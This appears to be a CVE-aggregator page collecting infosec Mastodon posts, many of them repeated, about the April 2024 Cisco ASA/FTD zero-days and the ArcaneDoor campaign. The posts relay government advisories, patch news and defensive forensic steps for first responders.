
Patches or Workaround

Cisco has released free software updates that address the vulnerability described in this advisory.

Tags

##

H3liumb0y@infosec.exchange at 2024-04-25T07:25:30.000Z ##

Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities

Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory

Issue Summary

The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.

Technical Key Findings

CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.

Vulnerable Products

  • Cisco Adaptive Security Appliance (ASA) Software
  • Cisco Firepower Threat Defense (FTD) Software

Impact Assessment

Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.

Patches or Workaround

Cisco has released free software updates that address the vulnerability described in this advisory.

Tags

#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity

##

h4sh at 2024-04-26T02:00:08.232Z ##

Multiple government agencies has published an advisory on an ongoing APT campaign targeting Cisco ASA / FTD devices using post-auth RCE bug CVE-2024-20359 and CVE-2024-20358.

They don't know how the attackers initially got in.

Important note from the research published by Cisco Talos calling the APT operation* "ArcaneDoor":

> We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date. Our investigation is ongoing, and we will provide updates, if necessary, in the security advisories or on this blog.

cyber.gc.ca/en/news-events/cyb

blog.talosintelligence.com/arc

##

jos1264@social.skynetcloud.site at 2024-04-24T20:55:04.000Z ##

ArcaneDoor Attack (CVE-2024-20353 and CVE-2024-20359) fortiguard.fortinet.com/threat

##

jos1264@social.skynetcloud.site at 2024-04-24T18:45:04.000Z ##

Hackers backdoored Cisco ASA devices via two zero-days (CVE-2024-20353, CVE-2024-20359) helpnetsecurity.com/2024/04/24 #government-backedattacks #securityupdate #Don'tmiss #Microsoft #Hotstuff #firewall #0-day #Cisco #Lumen #News #CISA #NCSC

##

screaminggoat at 2024-04-24T16:34:11.579Z ##

@GossiTheDog Here are the CVE security advisories:

  • CVE-2024-20353 (8.6 high) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability
  • CVE-2024-20359 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability
##

GossiTheDog@cyberplace.social at 2024-04-24T16:19:22.000Z ##

🚨🚨 two zero days in Cisco ASA AnyConnect under exploitation since last year

CVE-2024-20353 and CVE-2024-20359

blog.talosintelligence.com/arc

#threatintel #ArcaneDoor

##

h4sh@infosec.exchange at 2024-04-26T02:00:08.000Z ##

Multiple government agencies has published an advisory on an ongoing APT campaign targeting Cisco ASA / FTD devices using post-auth RCE bug CVE-2024-20359 and CVE-2024-20358.

They don't know how the attackers initially got in.

Important note from the research published by Cisco Talos calling the APT operation* "ArcaneDoor":

> We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date. Our investigation is ongoing, and we will provide updates, if necessary, in the security advisories or on this blog.

cyber.gc.ca/en/news-events/cyb

blog.talosintelligence.com/arc

##

screaminggoat@infosec.exchange at 2024-04-24T16:34:11.000Z ##

@GossiTheDog Here are the CVE security advisories:

  • CVE-2024-20353 (8.6 high) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability
  • CVE-2024-20359 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability
##

GossiTheDog@cyberplace.social at 2024-04-24T16:19:22.000Z ##

🚨🚨 two zero days in Cisco ASA AnyConnect under exploitation since last year

CVE-2024-20353 and CVE-2024-20359

blog.talosintelligence.com/arc

#threatintel #ArcaneDoor

##

CVE-2024-20353
(8.6 HIGH)

EPSS: 0.23%

updated 2024-04-26T15:22:27.803000

50 posts

A vulnerability in the management and VPN web servers for Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause the device to reload unexpectedly, resulting in a denial of service (DoS) condition. This vulnerability is due to incomplete error checking when parsing an HTTP header. An attacker co

1 repos

https://github.com/west-wind/Threat-Hunting-With-Splunk

screaminggoat at 2024-04-26T20:16:17.085Z ##

The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.

It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.

##

deltatux@infosec.town at 2024-04-25T13:48:46.786Z ##

The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.

As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.

www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353

##

mttaggart@infosec.town at 2024-04-25T07:32:55.969Z ##

Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.

If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.

blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359

##

screaminggoat at 2024-04-25T02:52:31.608Z ##

Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs

##

avuko at 2024-04-24T20:59:17.602Z ##

So, if you think you've maybe got / issues on your ASA (discovery methods here: blog.talosintelligence.com/arc), first things first:

DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)

"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."

This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.

What you should do is (I'll quote):

  1. Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support diagnostic-cli command.
  2. Use the enable command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.
  3. Collect the outputs of the following commands:
    • show version
    • verify /SHA-512 system:memory/text
    • debug menu memory 8
  4. Open a case with the Cisco Technical Assistance Center (TAC, cisco.com/c/en/us/support/inde). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.

Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.

I will repeat (without shouting this time):

Patching is not a fix!

"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."

There did pop up a third CVE () in between the Talos publication and the CISCO advisory page (sec.cloudapps.cisco.com/securi), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.

Final question for anyone still reading: why the debug menu memory 8? What does it do?

##

screaminggoat at 2024-04-24T19:27:17.460Z ##

I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:

cc: @todb @campuscodi @mttaggart @DaveMWilburn

##

screaminggoat at 2024-04-24T19:16:42.383Z ##

The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
cyber.gc.ca/en/news-events/cyb

##

mttaggart@infosec.town at 2024-04-24T17:57:29.306Z ##

The #Cisco vulns today smack a little of the Barracuda ones last year.

I really hope we don't end at "Toss these ASAs into a volcano."

#CVE_2024_20353 #CVE_2024_20359

##

screaminggoat at 2024-04-24T16:53:30.823Z ##

@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart

HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 cisa.gov/news-events/alerts/20

See original toot above for information on the Cisco exploited zero-days.

##

screaminggoat at 2024-04-24T16:11:54.051Z ##

Wake up babe, new Cisco actively exploited zero days just dropped:

  • CVE-2024-20353 (8.6 high) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability
  • CVE-2024-20359 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability

Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.

See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak

See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart

Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! cisa.gov/news-events/alerts/20

EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: cyber.gc.ca/en/news-events/cyb

EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:

cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig

##

screaminggoat@infosec.exchange at 2024-04-26T20:16:17.000Z ##

The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.

It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.

#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw

##

deltatux@infosec.town at 2024-04-25T13:48:46.786Z ##

The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.

As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.

www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353

##

mttaggart@infosec.town at 2024-04-25T07:32:55.969Z ##

Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.

If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.

blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359

##

screaminggoat@infosec.exchange at 2024-04-25T02:52:31.000Z ##

Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs

#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV

##

avuko@infosec.exchange at 2024-04-24T20:59:17.000Z ##

So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: blog.talosintelligence.com/arc), first things first:

DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)

"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."

This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.

What you should do is (I'll quote):

  1. Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support diagnostic-cli command.
  2. Use the enable command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.
  3. Collect the outputs of the following commands:
    • show version
    • verify /SHA-512 system:memory/text
    • debug menu memory 8
  4. Open a case with the Cisco Technical Assistance Center (TAC, cisco.com/c/en/us/support/inde). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.

Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.

I will repeat (without shouting this time):

Patching is not a fix!

"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."

There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (sec.cloudapps.cisco.com/securi), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.

#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity

Final question for anyone still reading: why the debug menu memory 8? What does it do?

##

screaminggoat@infosec.exchange at 2024-04-24T19:27:17.000Z ##

I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:

cc: @todb @campuscodi @mttaggart @DaveMWilburn

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

##

screaminggoat@infosec.exchange at 2024-04-24T19:16:42.000Z ##

The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
cyber.gc.ca/en/news-events/cyb

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

##

mttaggart@infosec.town at 2024-04-24T17:57:29.306Z ##

The #Cisco vulns today smack a little of the Barracuda ones last year.

I really hope we don't end at "Toss these ASAs into a volcano."

#CVE_2024_20353 #CVE_2024_20359

##

screaminggoat@infosec.exchange at 2024-04-24T16:53:30.000Z ##

@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart

HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 cisa.gov/news-events/alerts/20

See original toot above for information on the Cisco exploited zero-days.

#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog

##

screaminggoat@infosec.exchange at 2024-04-24T16:11:54.000Z ##

Wake up babe, new Cisco actively exploited zero days just dropped:

  • CVE-2024-20353 (8.6 high) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability
  • CVE-2024-20359 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability

Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.

See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak

See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart

Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! cisa.gov/news-events/alerts/20

EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: cyber.gc.ca/en/news-events/cyb

EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:

cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig

#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #KnownExploitedVulnerabilitiesCatalog #CISA #UAT4356 #threatintel #IOC

##

H3liumb0y at 2024-04-25T07:25:30.414Z ##

Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities

Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory

Issue Summary

The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.

Technical Key Findings

CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.

Vulnerable Products

  • Cisco Adaptive Security Appliance (ASA) Software
  • Cisco Firepower Threat Defense (FTD) Software

Impact Assessment

Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.

Patches or Workaround

Cisco has released free software updates that address the vulnerability described in this advisory.

Tags

##

H3liumb0y@infosec.exchange at 2024-04-25T07:25:30.000Z ##

Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities

Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory

Issue Summary

The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.

Technical Key Findings

CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.

Vulnerable Products

  • Cisco Adaptive Security Appliance (ASA) Software
  • Cisco Firepower Threat Defense (FTD) Software

Impact Assessment

Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.

Patches or Workaround

Cisco has released free software updates that address the vulnerability described in this advisory.

Tags

#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity

##

screaminggoat at 2024-04-26T20:16:17.085Z ##

The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.

It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.

##

deltatux@infosec.town at 2024-04-25T13:48:46.786Z ##

The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.

As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.

www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353

##

mttaggart@infosec.town at 2024-04-25T07:32:55.969Z ##

Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.

If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.

blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359

##

screaminggoat at 2024-04-25T02:52:31.608Z ##

Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs

##

avuko at 2024-04-24T20:59:17.602Z ##

So, if you think you've maybe got / issues on your ASA (discovery methods here: blog.talosintelligence.com/arc), first things first:

DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)

"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."

This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.

What you should do is (I'll quote):

  1. Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support diagnostic-cli command.
  2. Use the enable command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.
  3. Collect the outputs of the following commands:
    • show version
    • verify /SHA-512 system:memory/text
    • debug menu memory 8
  4. Open a case with the Cisco Technical Assistance Center (TAC, cisco.com/c/en/us/support/inde). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.

Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.

I will repeat (without shouting this time):

Patching is not a fix!

"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."

There did pop up a third CVE () in between the Talos publication and the CISCO advisory page (sec.cloudapps.cisco.com/securi), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.

Final question for anyone still reading: why the debug menu memory 8? What does it do?

##

screaminggoat at 2024-04-24T19:27:17.460Z ##

I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:

cc: @todb @campuscodi @mttaggart @DaveMWilburn

##

screaminggoat at 2024-04-24T19:16:42.383Z ##

The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
cyber.gc.ca/en/news-events/cyb

##

mttaggart@infosec.town at 2024-04-24T17:57:29.306Z ##

The #Cisco vulns today smack a little of the Barracuda ones last year.

I really hope we don't end at "Toss these ASAs into a volcano."

#CVE_2024_20353 #CVE_2024_20359

##

screaminggoat at 2024-04-24T16:53:30.823Z ##

@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart

HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 cisa.gov/news-events/alerts/20

See original toot above for information on the Cisco exploited zero-days.

##

screaminggoat at 2024-04-24T16:11:54.051Z ##

Wake up babe, new Cisco actively exploited zero days just dropped:

  • CVE-2024-20353 (8.6 high) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability
  • CVE-2024-20359 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability

Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.

See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak

See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart

Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! cisa.gov/news-events/alerts/20

EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: cyber.gc.ca/en/news-events/cyb

EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:

cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig

##

screaminggoat@infosec.exchange at 2024-04-26T20:16:17.000Z ##

The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.

It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.

#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw

##

deltatux@infosec.town at 2024-04-25T13:48:46.786Z ##

The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.

As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.

www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353

##

mttaggart@infosec.town at 2024-04-25T07:32:55.969Z ##

Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.

If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.

blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359

##

screaminggoat@infosec.exchange at 2024-04-25T02:52:31.000Z ##

Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs

#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV

##

avuko@infosec.exchange at 2024-04-24T20:59:17.000Z ##

So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: blog.talosintelligence.com/arc), first things first:

DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)

"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."

This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.

What you should do is (I'll quote):

  1. Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support diagnostic-cli command.
  2. Use the enable command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.
  3. Collect the outputs of the following commands:
    • show version
    • verify /SHA-512 system:memory/text
    • debug menu memory 8
  4. Open a case with the Cisco Technical Assistance Center (TAC, cisco.com/c/en/us/support/inde). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.

Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.

I will repeat (without shouting this time):

Patching is not a fix!

"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."

There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (sec.cloudapps.cisco.com/securi), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.

#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity

Final question for anyone still reading: why the debug menu memory 8? What does it do?

##

screaminggoat@infosec.exchange at 2024-04-24T19:27:17.000Z ##

I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:

cc: @todb @campuscodi @mttaggart @DaveMWilburn

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

##

screaminggoat@infosec.exchange at 2024-04-24T19:16:42.000Z ##

The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
cyber.gc.ca/en/news-events/cyb

